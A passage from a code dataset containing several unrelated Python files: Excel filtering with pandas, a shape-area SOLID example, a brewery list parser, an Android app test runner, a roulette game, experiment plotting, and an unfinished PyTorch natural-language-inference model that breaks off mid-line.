\"TBD\"\n if apicem_service_type == 4: \n print(\"\\nQUITTING APPLICATION\\n\") \n sys.exit(0)\n except Exception as e: \n print(\"\\n\\n***oops***3\") \n sys.exit(1)\n \n return apicem_service_type\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":6315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"463568407","text":"#!/usr/bin/env python3\nimport pandas as pd\nimport sys\n\ninput_file = 'xls/sales_2013.xlsx'\noutput_file = 'output/ex02_output.xls'\n\nmy_sheets = [0, 1] #sheet\nthreshold = 1900.0 #기준 값.\n\ndata_frame = pd.read_excel(input_file, sheet_name=my_sheets, index_col=None)\n\nrow_list = []\nfor worksheet_name, data in data_frame.items():\n row_list.append(data[data['Sale Amount'].astype(float) > threshold])\nfilter_rows = pd.concat(row_list, axis=0, ignore_index=True)\nwriter = pd.ExcelWriter(output_file)\nfilter_rows.to_excel(writer, sheet_name='set_of_worksheets', index=False)\nwriter.save()","sub_path":"FoundationsForAnalyticsWithPython/Week9/ex02_pandas_value_meets_condition_set_of_worksheets.py","file_name":"ex02_pandas_value_meets_condition_set_of_worksheets.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"632873092","text":"import math\n\n\nclass AreaCalculator:\n def calculate(self, shapes):\n area = 0\n\n for shape in shapes:\n if isinstance(shape, Square):\n area += (shape.width * shape.height)\n if isinstance(shape, Circle):\n area += math.pi * shape.radius ** 2\n\n return area\n\n\nclass Square:\n def __init__(self, width, height):\n self.width = width\n self.height = height\n\n\nclass Circle:\n def __init__(self, radius):\n self.radius = radius\n\n\ndef main():\n square_1 = Square(3, 5)\n square_2 = Square(4, 6)\n\n circle_1 = Circle(5)\n circle_2 = Circle(7)\n\n area_calculator = AreaCalculator()\n print(area_calculator.calculate([square_1, square_2, circle_1, circle_2]))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"design_principles/SOLID/OCP/bad/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"639959595","text":"import csv\n\ndef parse(filename):\n states = ['Name', 'Address', 'City-State', 'Phone', 'Type','Web']\n\n state = -1\n brewerList = []\n\n base = {'name':'', 'address':'', 'city-state':'', 
'phone':'', 'type':'', 'web':''}\n brewer = base.copy()\n\n with open(filename) as F:\n for line in F.readlines():\n\n line = line.replace('\\n','')\n invalidLine = False\n if '----------' in line:\n invalidLine = True\n\n if '**********' in line:\n invalidLine = True\n\n if '&&&&&&&&&&' in line:\n invalidLine = True\n\n if '$$$$$$$$$$' in line:\n invalidLine = True\n\n if len(line) < 4:\n continue\n\n # Sense state:\n if 'Type:' in line:\n state = 4\n elif '| Map' in line:\n state = 2\n elif 'Phone:' in line:\n state = 3\n elif invalidLine:\n state = -1\n if len(brewer['name']) > 0:\n brewerList.append(brewer)\n brewer = base.copy()\n continue\n else:\n state += 1\n\n if state > 5:\n if len(brewer['name']) > 0:\n brewerList.append(brewer)\n brewer = base.copy()\n state = -1\n\n if state == 0:\n brewer['name'] = line.strip()\n elif state == 1:\n brewer['address'] = line.strip()\n elif state == 2:\n brewer['city-state'] = line.replace('| Map','').strip()\n elif state == 3:\n brewer['phone'] = line.replace('Phone:','').strip()\n elif state == 4:\n brewer['type'] = line.replace('Type:','').strip()\n elif state == 5:\n brewer['web'] = line.strip()\n\n\n return brewerList\n\nif __name__ == '__main__':\n import sys\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--filename', required=True)\n parser.add_argument('-o', '--outcsvfile', required=True)\n args = parser.parse_args()\n\n brewers = parse(args.filename)\n hdr = ['name','address','city-state','phone','type','web']\n with open(args.outcsvfile, 'wb') as f: # Just use 'w' mode in 3.x\n w = csv.writer(f)\n w.writerow(hdr)\n for row in brewers:\n w.writerow([row['name'],row['address'],row['city-state'],row['phone'],row['type'],row['web']])\n\n\n\n","sub_path":"data/parseBreweries.py","file_name":"parseBreweries.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"471957475","text":"import logging.config\n\nimport sys\nimport yaml\n\nfrom modules import agent\nfrom modules import apps\nfrom modules import config\nfrom modules.done_list_handler import list_handler, Status\nfrom modules.entities import Apk\nfrom modules.exceptions import AbsentActivityException, ManifestNotFoundException, UserExitException, ErrorInstallingException, ErrorUninstallingException, NotEnoughSpaceException\nfrom modules.tester import Tester\n\n\ndef setup_logging():\n with open('logging.yaml') as f:\n logging.config.dictConfig(yaml.safe_load(f.read()))\n\n\ndef main():\n logging.info(\"START EXPERIMENT\")\n apps_to_process, done_project_count, overall_apps = apps.get_apps_to_process(config.APK_REPOSITORY)\n counter = done_project_count\n fail_counter = list_handler.get_fail_counter()\n for app_name in apps_to_process:\n logging.info('================================================================================================================================================')\n apk = Apk(app_name)\n tester = Tester(apk)\n try:\n counter += 1\n logging.info(f'{app_name}: {counter} OF {overall_apps}, FAIL TO RUN: {fail_counter}')\n tester.test()\n except ErrorInstallingException:\n fail_counter += 1\n logging.exception(f'Cannot install app {app_name}')\n list_handler.write(app_name, Status.FAIL, reason='INSTALLATION ERROR')\n except NotEnoughSpaceException:\n logging.exception(f'Cannot install app {app_name} because there is not enough space. Stopping tool. 
Please, wipe data, then run tool again')\n sys.exit()\n except AbsentActivityException:\n fail_counter += 1\n logging.exception(f'Absent main activity for app {app_name}')\n tester.uninstall()\n list_handler.write(app_name, Status.FAIL, reason='ABSENT ACTIVITY')\n except ManifestNotFoundException:\n fail_counter += 1\n logging.error(f'Manifest not found for app {app_name}')\n list_handler.write(app_name, Status.FAIL, reason='MANIFEST NOT FOUND')\n tester.uninstall()\n except UserExitException:\n logging.info(f'User has chosen to exit while testing {app_name}')\n list_handler.write(app_name, Status.UNDEFINED, reason='USER_EXIT')\n tester.uninstall()\n sys.exit()\n except ErrorUninstallingException:\n logging.exception(f'Cannot uninstall {app_name}')\n list_handler.write(app_name, Status.SUCCESS, comment='UNINSTALL ERROR')\n except BaseException:\n fail_counter += 1\n logging.exception(f'Exception for app {app_name}')\n tester.uninstall()\n list_handler.write(app_name, Status.FAIL, reason='UNKNOWN')\n agent.close_crash_report()\n list_handler.close()\n\n\nif __name__ == \"__main__\":\n setup_logging()\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"551267085","text":"import math\nimport random\nimport time\n\ndef choixDuNumero():\n#Cette fonction va permettre au joueur de choisir son numéro\n numeroJoueur = input(\"Veuillez entrer un numéro compris en 0 et 50\\n\")\n\n try:\n numeroJoueur = int(numeroJoueur)\n if numeroJoueur < 0 or numeroJoueur >= 50:\n print(\"Le nombre saisie n'est pas compris entre 0 et 50\\n\")\n return choixDuNumero()\n return numeroJoueur\n except ValueError:\n print(\"Ce que vous avez saisie n'est pas un nombre\\n\")\n return choixDuNumero()\n\ndef choixMise(miseInitiale):\n#Cette fonction va permettre au joueur de choisir sa mise\n print(\"Votre cagnotte actuelle s'élève à {}\\n\".format(miseInitiale))\n\n mise = input(\"Veuillez choisir votre mise\")\n\n try:\n mise = int(mise)\n if mise < 0:\n print(\"Votre mise doit être supérieure à 0\")\n return choixMise(miseInitiale)\n elif mise > miseInitiale:\n print(\"Vous n'avez pas assez d'argent pour faire cela\")\n return choixMise(miseInitiale)\n return mise\n except ValueError:\n print(\"Ce que vous avez saisie n'est pas un nombre\")\n return choixMise(miseInitiale)\n\n\ndef billeAleatoire():\n#Fonction qui va permettre au casino de choisir aléatoirement un numéro entre 0 et 49\n\n print(\"Attention Faites vos JEUX !!!\\n\")\n time.sleep(2)\n numeroAleatoire = random.randrange(50)\n return numeroAleatoire\n\ndef couleurDesBilles(numero):\n#Fonction qui va déterminer la couleur des billes\n\n if numero % 2 == 0:\n couleurBille = \"noire\"\n else:\n couleurBille = \"rouge\"\n return couleurBille\n\ndef gainDuJoueur(mise, numeroJoueur, numeroAleatoire):\n#Fonction qui va déterminer le gain des joueurs et retourner le gain\n\n if numeroJoueur == numeroAleatoire:\n print(\"Vous avez trouvé le bon numéro\\n\")\n gain = mise + 3 * mise\n print(\"Vous gagnez {}$ \\n\".format(gain - mise))\n elif numeroJoueur != numeroAleatoire and couleurDesBilles(numeroJoueur) == couleurDesBilles(numeroAleatoire):\n print(\"Vous n'avez pas trouvé le bon numéro mais la couleur est correcte\\n\")\n gain = mise + 0.5 * mise\n print(\"Vous gagnez {}$ \\n\".format(gain - mise))\n else:\n print(\"Dommage, vous avez perdu\\n\")\n gain = 0\n print(\"Vous perdez votre mise\\n\")\n return 
math.ceil(gain)\n\n","sub_path":"ZCasino/Fonctions.py","file_name":"Fonctions.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"242175209","text":"#!/usr/bin/env python\n# encoding=utf8 \nimport sys \n\nreload(sys) \nsys.setdefaultencoding('utf8')\n\nimport matplotlib.pyplot as plt\n\ndef graf1(entrada, salidas, modo = \"Tam\", exp = \"1\"):\n fig, ax = plt.subplots()\n with open(entrada, \"r\") as f:\n lineas = f.readlines()\n listaTam = map(lambda x : int(x), lineas[0].split())\n listaN = lineas[1].split()\n lineas = map(lambda l : l.split(), lineas)\n listaCalidad = [[ int(lineas[2 * x][y]) for x in range(1, len(listaTam) + 1)] for y in range(len(listaN))]\n listaTiempos = [[ float(lineas[2 * x + 1][y]) for x in range(1, len(listaTam) + 1)] for y in range(len(listaN))]\n for i in range(len(listaCalidad)):\n minC = min(listaCalidad[i])\n listaCalidad[i] = map(lambda x : x - minC, listaCalidad[i])\n if (exp != \"3\"):\n for i in range(len(listaTiempos)):\n minT = min(listaTiempos[i])\n listaTiempos[i] = map(lambda x : x - minT, listaTiempos[i])\n\n fig, ax = plt.subplots()\n width = 3.5 / len(listaTiempos)\n colors = [\"DarkGreen\", \"SaddleBrown\", \"Purple\"]\n if (len(listaCalidad) > 1):\n ax.bar([val - width * 1.5 for val in listaTam], [val for val in listaCalidad[0]], width, color = colors[0])\n ax.bar([val - width * 0.5 for val in listaTam], [val for val in listaCalidad[1]], width, color = colors[1])\n else:\n ax.bar([val - width * 0.5 for val in listaTam], [val for val in listaCalidad[0]], width, color = colors[0])\n if (len(listaCalidad) > 2):\n ax.bar([val + width * 0.5 for val in listaTam], [val for val in listaCalidad[2]], width, color = colors[2])\n ax.set_xticklabels(map(lambda x: str(x), listaTam), minor = True)\n \n ax.set_ylabel(\"#E\")\n ax.margins(0.05)\n ax.set_xlim([min(listaTam) * 0.95, max(listaTam) * 1.05])\n ax.set_ylim([0, max([max(l) for l in listaCalidad]) * 1.3])\n if (modo == \"Tam\"):\n ax.set_xlabel(unicode(\"Tamaño de la lista Tabú\"))\n elif (modo == \"ItMax\"):\n ax.set_xlabel(unicode(\"Cantidad de iteraciones máximas\"))\n elif (modo == \"ItSMej\"):\n ax.set_xlabel(unicode(\"Cantidad de iteraciones máximas sin mejorar\"))\n if (len(listaN) > 1):\n ax.legend([\"N₁ = \" + str(l) for l in listaN], loc = 2)\n fig.savefig(salidas[0])\n\n plt.cla()\n\n fig2, ax2 = plt.subplots()\n width = 3.5 / len(listaTiempos)\n colors = [\"DarkGreen\", \"SaddleBrown\", \"Purple\"]\n if (len(listaTiempos) > 1):\n ax2.bar([val - width * 1.5 for val in listaTam], [val for val in listaTiempos[0]], width, color = colors[0])\n ax2.bar([val - width * 0.5 for val in listaTam], [val for val in listaTiempos[1]], width, color = colors[1])\n else:\n ax2.bar([val - width * 0.5 for val in listaTam], [val for val in listaTiempos[0]], width, color = colors[0])\n if (len(listaTiempos) > 2):\n ax2.bar([val + width * 0.5 for val in listaTam], [val for val in listaTiempos[2]], width, color = colors[2])\n ax2.set_xticklabels(map(lambda x: str(x), listaTam), minor = True)\n \n ax2.set_ylabel(\"Tiempo [s]\")\n ax2.margins(0.05)\n ax2.set_xlim([min(listaTam) * 0.95, max(listaTam) * 1.05])\n ax2.set_ylim([0, max([max(l) for l in listaTiempos]) * 1.3])\n if (modo == \"Tam\"):\n ax2.set_xlabel(unicode(\"Tamaño de la lista Tabú\"))\n elif (modo == \"ItMax\"):\n ax2.set_xlabel(unicode(\"Cantidad de iteraciones máximas\"))\n elif (modo == \"ItSMej\"):\n ax2.set_xlabel(unicode(\"Cantidad de iteraciones 
máximas sin mejorar\"))\n if (len(listaN) > 1):\n ax2.legend([\"N₁ = \" + str(l) for l in listaN], loc = 2)\n fig2.savefig(salidas[1])\n\n#graf1(\"exp13.out\", [\"exp13Cal.png\", \"exp13Tiempos.png\"], \"ItMax\")\n#graf1(\"exp14.out\", [\"exp14Cal.png\", \"exp14Tiempos.png\"], \"ItMax\")\n#graf1(\"exp18.out\", [\"exp18bCal.png\", \"exp18bTiempos.png\"], \"Tam\", \"3\")\n","sub_path":"TabuC++/graficar.py","file_name":"graficar.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"357427805","text":"import torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nimport numpy as np\nimport random as r\n\nfrom torchnlp.word_to_vector import GloVe\nimport json\n\nimport sys\n\nFOLDER_PATH =None\nDEBUG = True\ndef DEBUG_PRINT(x):\n if DEBUG:\n print(x)\n\n\nGLOVE_DATA = GloVe(name='6B', dim=100)\n\ndef list2dict(lst):\n it = iter(lst)\n indexes = range(len(lst))\n res_dct = dict(zip(it, indexes))\n return res_dct\n\ndef reverseDict(d):\n vals = ['']*len(d.keys())\n for k in d.keys():\n vals[d[k]] = k\n return vals\n\n''' Seems like gloves works on words! not indexes!!!! '''\n\nclass As3Dataset(Dataset):\n def __init__(self, file_path, is_test_data=False, is_train_data=True): \n \n self.file_path = file_path\n \n dataset = []\n sample_w = []\n sample_t = []\n word_list = []\n tag_list = []\n \n with open(file_path, \"r\") as df:\n for line in df:\n line = line.strip()\n line = json.loads(line)\n if (line['gold_label'] == 'entailment') or (line['gold_label'] == 'contradiction') or (line['gold_label'] == 'neutral'): \n dataset.append({\n 'premise': line['sentence1'].split(),\n 'hypothesis':line['sentence2'].split(),\n 'label':line['gold_label']\n })\n \n #self.word_set = set(word_list)\n #self.tag_set = set(tag_list)\n self.dataset = dataset\n self.is_test_data = is_test_data\n self.is_train_data = is_train_data\n\n def __len__(self):\n return len(self.dataset)\n\n def setTranslators(self, wT, lT):\n self.wT = wT\n self.lT = lT\n\n def toIndexes(self, wT, lT):\n self.dataset = [{'premise':wT.translate(data['premise']), 'hypothesis':wT.translate(data['hypothesis']), 'label':lT.translate(data['label'])} for data in self.dataset]\n #self.dataset = [(wT.translate(data[0], self.is_train_data), lT.translate(data[1]) if self.is_test_data==False else None, data[2]) for data in self.dataset]\n\n def __getitem__(self, index):\n data = self.dataset[index]\n return {'premise': self.wT.translate(data['premise']), 'hypothesis': self.wT.translate(data['hypothesis']), 'label': self.lT.translate(data['label'])}\n #return self.dataset[index]\n\nclass WTranslator(object):\n def __init__(self, init=True):\n if init:\n self.wdict = GLOVE_DATA.token_to_index\n unknown_idx = len(GLOVE_DATA)\n self.wdict.update({\"UNKNOWN\":unknown_idx})\n self.wpadding_idx = unknown_idx + 1\n \n #wordset.update([\"UNKNOWN\"])\n cset = list(\" abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,;.!?:'\\\"/\\\\|_@#$%^&*~`+-=<>()[]{}\")\n cset.append(\"UNKNOWN\")\n self.cdict = list2dict(cset)\n self.cpadding_idx = len(self.cdict)\n\n def getPaddingIndex(self):\n return {'w':self.wpadding_idx, 'c':self.cpadding_idx}\n\n def saveParams(self):\n return {'cdict':self.cdict, 'wdict':self.wdict}\n\n def loadParams(self, params):\n self.cdict = params['cdict']\n self.wdict = params['wdict']\n\n def _dictHandleExp(self, dic, val):\n try: \n return dic[val]\n except KeyError:\n return dic['UNKNOWN']\n \n def 
_translate1(self, word_list):\n # Note that GLOVE is using only lower case words, hence we need to lower case the words\n return [self._dictHandleExp(self.wdict, word.lower()) for word in word_list]\n\n def _translate2(self, word_list):\n letter_trans = [np.array([self._dictHandleExp(self.cdict, l) for l in word]) for word in word_list]\n lengths = [len(word) for word in word_list]\n return [letter_trans, lengths]\n\n def translate(self, word_list):\n first = np.array(self._translate1(word_list))\n second = self._translate2(word_list)\n return {'word': first, 'chars': second}\n\n def getLengths(self):\n return {'word' : len(self.wdict), 'c' : len(self.cdict)}\n\nclass TagTranslator(object):\n def __init__(self, init=True):\n if init:\n tagset = ['entailment', 'contradiction', 'neutral'] \n self.tag_dict = list2dict(tagset)\n\n def translate(self, tag):\n return self.tag_dict[tag]\n \n def getLengths(self):\n return {'tag': len(self.tag_dict)}\n\n def getPaddingIdx(self):\n return {'tag': len(self.tag_dict)}\n\n def saveParams(self):\n return {'tag':self.tag_dict}\n\n def loadParams(self, params):\n self.tag_dict = params['tag']\n\n\nclass MyEmbedding(nn.Module):\n def __init__(self, embedding_dim, translator, c_embedding_dim):\n super(MyEmbedding, self).__init__()\n padding_idx = translator.getPaddingIndex()['w']\n num_embedding = translator.getLengths()['word']\n #self.wembeddings = nn.Embedding(num_embeddings = num_embedding + 1, embedding_dim = embedding_dim, padding_idx = padding_idx)\n vecs = GLOVE_DATA.vectors\n pad = torch.zeros((2,vecs[0].shape[0]))\n vecs = torch.cat((vecs, pad), 0)\n self.wembeddings = nn.Embedding.from_pretrained(embeddings = vecs, freeze=False,\n padding_idx = padding_idx) \n\n padding_idx = translator.getPaddingIndex()['c']\n num_embedding = translator.getLengths()['c']\n self.cembeddings = nn.Embedding(num_embeddings = num_embedding + 1, embedding_dim = c_embedding_dim, padding_idx = padding_idx)\n \n def forward(self, data):\n word_embeds = self.wembeddings(torch.tensor(data[0]).long())\n char_embeds = self.cembeddings(torch.tensor(data[1]).long())\n return (word_embeds, char_embeds)\n\nclass Padding(object):\n def __init__(self, wT, lT):\n self.wT = wT\n self.lT = lT\n \n self.wPadIndex = self.wT.getPaddingIndex()['w']\n self.cPadIndex = self.wT.getPaddingIndex()['c']\n \n def padData(self, data_b, len_b, max_l, padIndex):\n batch_size = len(len_b)\n padded_data = np.ones((batch_size, max_l))*padIndex\n for i, data in enumerate(data_b):\n padded_data[i][:len_b[i]] = data #first embeddings\n return padded_data\n\n def padTag(self, tag_b, len_b, max_l, padIndex):\n batch_size = len(len_b)\n padded_tag = np.ones((batch_size, max_l))*padIndex\n for i,tag in enumerate(tag_b):\n padded_tag[i][:len_b[i]] = np.array(tag)\n return padded_tag\n \n def padList(self, data_b, lens_b, max_l):\n # Expect data_b shape = , , [, 1]\n # returns: , , \n\n w_max_l = 0\n for batch in data_b:\n sentence, word_len = batch\n m = max(word_len)\n if m > w_max_l:\n w_max_l = m\n\n batch_size = len(lens_b)\n padded_words = np.ones((batch_size, max_l, w_max_l))*self.cPadIndex\n padded_lens = np.ones((batch_size, max_l))\n for i, batch in enumerate(data_b):\n sentence, words_len = batch\n for j, word in enumerate(sentence):\n word_len = words_len[j]\n padded_words[i][j][:word_len] = word\n padded_lens[i][j] = word_len\n \n return padded_words, padded_lens\n\n def collate_fn(self, data):\n #data.sort(key=lambda x: x[2], reverse=True)\n\n tag_b = [d['label'] for d in data]\n \n 
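# Pad word ids to the longest sentence in the batch and per-word char ids\n        # to the longest word (via padData / padList above) so each field stacks\n        # into a fixed-size array; the scalar labels need no padding.\n        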
premise_w_lens = [len(d['premise']['word']) for d in data]\n        data_premise = [d['premise']['word'] for d in data]\n        padded_premise_w = self.padData(data_premise, premise_w_lens, max(premise_w_lens), self.wPadIndex)\n        \n        hyp_w_lens = [len(d['hypothesis']['word']) for d in data]\n        data_hyp = [d['hypothesis']['word'] for d in data]\n        padded_hyp_w = self.padData(data_hyp, hyp_w_lens, max(hyp_w_lens), self.wPadIndex)\n\n        data_premise = [d['premise']['chars'] for d in data]\n        padded_premise_c, padded_premise_sublens = self.padList(data_premise, premise_w_lens, max(premise_w_lens))\n\n        data_hyp = [d['hypothesis']['chars'] for d in data]\n        padded_hyp_c, padded_hyp_sublens = self.padList(data_hyp, hyp_w_lens, max(hyp_w_lens))\n\n        premise_data = {'w_data': padded_premise_w, 'w_lens': premise_w_lens, 'c_data': padded_premise_c, 'c_lens': padded_premise_sublens}\n        hyp_data = {'w_data': padded_hyp_w, 'w_lens': hyp_w_lens, 'c_data': padded_hyp_c, 'c_lens': padded_hyp_sublens}\n        return premise_data, hyp_data, tag_b\n\n    \n\nclass BiLSTM(nn.Module):\n    def __init__(self, embedding_dim, hidden_rnn_dim, tagset_size,\n            translator, c_embedding_dim, filters_dim = 100, filters = [1,3,5], dropout=False, add_tanh=False,\n            num_lstm_layers = 3):\n        super(BiLSTM, self).__init__()\n        self.c_embeds_dim = c_embedding_dim\n        self.embedding_dim = embedding_dim\n        # Embedding layers\n        padding_idx = translator.getPaddingIndex()['w']\n        num_embedding = translator.getLengths()['word']\n        vecs = GLOVE_DATA.vectors\n        pad = torch.zeros((2,vecs[0].shape[0]))\n        vecs = torch.cat((vecs, pad), 0)\n        self.wembeddings = nn.Embedding.from_pretrained(embeddings = vecs, freeze=False,\n                padding_idx = padding_idx) \n\n        padding_idx = translator.getPaddingIndex()['c']\n        num_embedding = translator.getLengths()['c']\n        self.cembeddings = nn.Embedding(num_embeddings = num_embedding + 1, embedding_dim = c_embedding_dim, padding_idx = padding_idx)\n\n        self.dropout_0 = nn.Dropout() \n        #self.lstmc = nn.LSTM(input_size = c_embedding_dim, hidden_size = embedding_dim,\n        #        batch_first = True)\n        # nn.ModuleList (rather than a plain list) so the layers register their parameters\n        self.conv_list = nn.ModuleList()\n        for kernel in filters:\n            self.conv_list.append(nn.Conv2d(c_embedding_dim, filters_dim, kernel))\n        self.lstm_list = nn.ModuleList()\n        for i in range(num_lstm_layers):\n            self.lstm_list.append(nn.LSTM(input_size = embedding_dim*(len(filters) + 1), hidden_size = hidden_rnn_dim,\n                bidirectional=True, num_layers=1, batch_first=True))\n        '''\n        To be replaced \n        self.linear1 = nn.Linear(hidden_rnn_dim*2, tagset_size)\n        self.dropout_1 = nn.Dropout() \n        self.lineare = nn.Linear(embedding_dim*2, embedding_dim)\n        self.dropout_e = nn.Dropout()\n        self.dropout = dropout\n        self.add_tanh = add_tanh\n        '''\n\n    def conv(self, e_batch):\n        for conv_layer in self.conv_list:\n            c = conv_layer(e_batch)\n            c = nn.functional.relu(c)\n            c = torch.max(c, 2)[0]  # torch.max returns (values, indices); keep the pooled values\n        return c\n\n    def forward(self, sample):\n        premise_data, hyp_data, tag_b = sample\n\n        padded_premise_w = premise_data['w_data']\n        premise_w_lens = premise_data['w_lens']\n        padded_premise_c = premise_data['c_data']\n\n        padded_hyp_w = hyp_data['w_data']\n        hyp_w_lens = hyp_data['w_lens']\n        padded_hyp_c = hyp_data['c_data']\n\n        batch_size = len(padded_premise_w)\n\n        prem_w_e = self.wembeddings(torch.tensor(padded_premise_w).long())\n        hyp_w_e = self.wembeddings(torch.tensor(padded_hyp_w).long())\n        prem_c_e = self.cembeddings(torch.tensor(padded_premise_c).long())\n        hyp_c_e = self.cembeddings(torch.tensor(padded_hyp_c).long())\n        \n        print(prem_c_e.shape)\n        ''' Currently it's NumWordsXMaxNumCharsXEmbeddingSize -> need to reshape into \n            
EmbeddingsSizeXNumWordsXMaxNumChars because the embedding size is the channels '''\n prem_c_conv = self.conv(prem_c_e)\n print(prem_c_conv) \n #embeds_list = self.embeddings.forward(data_list)\n \n embeds_word = embeds_list[0]\n embeds_char = embeds_list[1]\n char_data_list = data_list[1]\n\n #lstm_embeds_word = self.runLSTMc(char_data_list, embeds_char, padded_sublens) \n\n e_joined = torch.cat((embeds_word, lstm_embeds_word), dim=2)\n flatten = e_joined.reshape(-1, e_joined.shape[2])\n if self.dropout:\n e_joined = self.dropout_e(e_joined)\n le_out = self.lineare(e_joined)\n if self.add_tanh:\n le_out = torch.tanh(le_out)\n embeds_out = le_out.reshape(batch_size, e_joined.shape[1], self.embedding_dim)\n \n if self.dropout:\n embeds_out = self.dropout_0(embeds_out)\n\n packed_embeds = torch.nn.utils.rnn.pack_padded_sequence(embeds_out, len_list, batch_first=True)\n lstm_out, _ = self.lstm(packed_embeds)\n unpacked_lstm_out, _ = torch.nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first = True)\n\n flatten = unpacked_lstm_out.reshape(-1, unpacked_lstm_out.shape[2])\n if self.dropout:\n flatten = self.dropout_1(flatten)\n o_ln1 = self.linear1(flatten)\n shaped = o_ln1.reshape(batch_size, unpacked_lstm_out.shape[1], o_ln1.shape[1])\n return shaped\n\n def getLabel(self, data):\n _, prediction_argmax = torch.max(data, 1)\n return prediction_argmax\n\n\nclass Run(object):\n def __init__(self, params):\n self.edim = params['EMBEDDING_DIM']\n self.rnn_h_dim = params['RNN_H_DIM']\n self.num_epochs = params['EPOCHS']\n self.batch_size = params['BATCH_SIZE']\n self.c_embedding_dim = params['CHAR_EMBEDDING_DIM']\n self.train_file = params['TRAIN_FILE']\n self.dev_file = params['DEV_FILE']\n self.test_file = params['TEST_FILE']\n self.test_o_file = params['TEST_O_FILE']\n self.model_file = params['MODEL_FILE']\n self.save_to_file = params['SAVE_TO_FILE']\n self.run_dev = params['RUN_DEV']\n self.learning_rate = params['LEARNING_RATE']\n self.dropout = params['DROPOUT']\n self.acc_data_list = []\n\n def _save_model_params(self, tagger, wT, lT):\n try:\n params = torch.load(self.model_file)\n except FileNotFoundError:\n print(\"No model params file found - creating new model params\")\n params = {}\n\n flavor_params = {}\n flavor_params.update({'tagger' : tagger.state_dict()})\n flavor_params.update({'wT' : wT.saveParams()})\n flavor_params.update({'lT' : lT.saveParams()})\n params.update({'ModelParams' : flavor_params})\n torch.save(params, self.model_file)\n\n def _load_translators_params(self, wT, lT):\n params = torch.load(self.model_file)\n flavor_params = params['ModelParams']\n wT.loadParams(flavor_params['wT'])\n lT.loadParams(flavor_params['lT'])\n\n def _load_bilstm_params(self, tagger):\n params = torch.load(self.model_file)\n flavor_params = params[str('ModelParams')]\n tagger.load_state_dict(flavor_params['tagger'])\n\n def _calc_batch_acc(self, tagger, flatten_tag, flatten_label): \n predicted_tags = tagger.getLabel(flatten_tag)\n diff = predicted_tags - flatten_label\n no_diff = (diff == 0)\n padding_mask = (flatten_label == self.lTran.getLengths()['tag'])\n if self.ignore_Os:\n Os_mask = (flatten_label == self.lTran.tag_dict['O'])\n no_diff_and_padding_label = no_diff*(padding_mask + Os_mask)\n no_diff_and_padding_label = (no_diff_and_padding_label > 0)\n else:\n no_diff_and_padding_label = no_diff*padding_mask\n\n to_ignore = len(no_diff_and_padding_label[no_diff_and_padding_label == True])\n tmp = len(diff[diff == 0]) - to_ignore\n if tmp < 0:\n raise Exception(\"non valid tmp 
value\")\n correct_cntr = tmp \n total_cntr = len(predicted_tags) - to_ignore\n return correct_cntr, total_cntr\n\n def _flat_vecs(self, batch_tag_score, batch_label_list):\n flatten_tag = batch_tag_score.reshape(-1, batch_tag_score.shape[2])\n flatten_label = torch.LongTensor(batch_label_list.reshape(-1))\n return flatten_tag, flatten_label\n\n def runOnDev(self, tagger, padder):\n tagger.eval()\n dev_dataset = As3Dataset(self.dev_file, False, False)\n #dev_dataset.toIndexes(wT = self.wTran, lT = self.lTran)\n dev_dataset.setTranslators(wT = self.wTran, lT = self.lTran)\n dev_dataloader = DataLoader(dataset=dev_dataset,\n batch_size=self.batch_size, shuffle=False,\n collate_fn = padder.collate_fn)\n with torch.no_grad():\n correct_cntr = 0\n total_cntr = 0\n for sample in dev_dataloader:\n batch_data_list, batch_label_list, batch_len_list, padded_sublens = sample\n\n batch_tag_score = tagger.forward(batch_data_list, batch_len_list, padded_sublens)\n \n flatten_tag, flatten_label = self._flat_vecs(batch_tag_score, batch_label_list)\n\n #calc accuracy\n c, t = self._calc_batch_acc(tagger, flatten_tag, flatten_label)\n correct_cntr += c \n total_cntr += t\n \n acc = correct_cntr/total_cntr\n self.acc_data_list.append(acc)\n print(\"Validation accuracy \" + str(acc))\n \n tagger.train()\n\n\n def _saveAccData(self):\n try:\n acc_data = torch.load('accuracy_graphs_data')\n except FileNotFoundError:\n print(\"No accuracy data file found - creating new\")\n acc_data = {}\n\n acc_data.update({str('ModelParams'): self.acc_data_list})\n torch.save(acc_data, 'accuracy_graphs_data')\n\n def test(self):\n test_dataset = As3Dataset(file_path = self.test_file, \n is_test_data = True, is_train_data = False)\n\n self.wTran = WTranslator(None, None, None, None, False)\n self.lTran = TagTranslator(None, False)\n\n self._load_translators_params(self.wTran, self.lTran)\n #test_dataset.toIndexes(wT = self.wTran, lT = self.lTran)\n test_dataset.setTranslators(wT = self.wTran, lT = self.lTran)\n\n tagger = BiLSTM(embedding_dim = self.edim, hidden_rnn_dim = self.rnn_h_dim,\n translator=self.wTran, tagset_size = self.lTran.getLengths()['tag'] + 1,\n c_embedding_dim = self.c_embedding_dim, dropout = self.dropout)\n\n self._load_bilstm_params(tagger)\n padder = Padding(self.wTran, self.lTran)\n \n test_dataloader = DataLoader(dataset=test_dataset,\n batch_size=1, shuffle=False,\n collate_fn = padder.collate_fn)\n\n reversed_dict = reverseDict(self.lTran.tag_dict)\n reversed_dict.append('UNKNOWN')\n with torch.no_grad():\n with open(self.test_o_file, 'w') as wf:\n for sample in 